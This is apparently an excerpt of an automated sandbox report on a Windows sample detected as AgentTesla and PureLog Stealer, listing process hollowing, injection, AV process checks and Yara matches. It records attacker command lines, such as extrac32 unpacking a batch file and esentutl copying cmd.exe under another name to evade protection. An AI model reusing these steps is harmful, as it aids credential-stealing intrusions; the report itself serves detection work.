                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_0040CE09
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_0040E61C
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00416F6A
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_004123F1 SetUnhandledExceptionFilter,9_2_004123F1
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_1_0040CE09
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_1_0040E61C
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_1_00416F6A
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_004123F1 SetUnhandledExceptionFilter,9_1_004123F1
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_0040CE09
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_0040E61C
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00416F6A
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_004123F1 SetUnhandledExceptionFilter,11_2_004123F1
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_1_0040CE09
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_1_0040E61C
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_1_00416F6A
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_004123F1 SetUnhandledExceptionFilter,11_1_004123F1
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Allocates memory in foreign processes
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: C:\Users\Public\Libraries\xrbjyllC.pif base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFMemory allocated: C:\Users\Public\Libraries\xrbjyllC.pif base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFMemory allocated: C:\Users\Public\Libraries\xrbjyllC.pif base: 400000 protect: page execute and read and write
                  Drops or copies cmd.exe with a different name (likely to bypass HIPS)
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                  Sample uses process hollowing technique
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection unmapped: C:\Users\Public\Libraries\xrbjyllC.pif base address: 400000Jump to behavior
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFSection unmapped: C:\Users\Public\Libraries\xrbjyllC.pif base address: 400000Jump to behavior
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFSection unmapped: C:\Users\Public\Libraries\xrbjyllC.pif base address: 400000
                  Writes to foreign memory regions
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Users\Public\Libraries\xrbjyllC.pif base: 3AF008Jump to behavior
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFMemory written: C:\Users\Public\Libraries\xrbjyllC.pif base: 382008Jump to behavior
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFMemory written: C:\Users\Public\Libraries\xrbjyllC.pif base: 283008
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\z1Transaction_ID_REF2418_cmd.bat" "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pifJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFProcess created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pifJump to behavior
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFProcess created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pif
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,3_2_031C5ACC
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetLocaleInfoA,3_2_031CA7C4
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,3_2_031C5BD8
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetLocaleInfoA,3_2_031CA810
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: GetLocaleInfoA,9_2_00417A20
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: GetLocaleInfoA,9_1_00417A20
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,10_2_031A5ACC
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,10_2_031A5BD7
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: GetLocaleInfoA,10_2_031AA810
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: GetLocaleInfoA,11_2_00417A20
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: GetLocaleInfoA,11_1_00417A20
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,16_2_03195ACC
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,16_2_03195BD7
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: GetLocaleInfoA,16_2_0319A810
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031C920C GetLocalTime,3_2_031C920C
                  Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 13_2_0040BBD4 GetTimeZoneInformation,13_2_0040BBD4
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031CB78C GetVersionExA,3_2_031CB78C
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
                  Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
                  Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
                  Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
                  Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
                  Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
                  Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: avgemc.exe
                  Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.2933710309.00000000227AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2037584251.0000000026FED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2037584251.0000000026FA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.2933710309.0000000022764000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1885700149.0000000029CE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: xrbjyllC.pif PID: 4544, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: xrbjyllC.pif PID: 4108, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: xrbjyllC.pif PID: 6568, type: MEMORYSTR
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
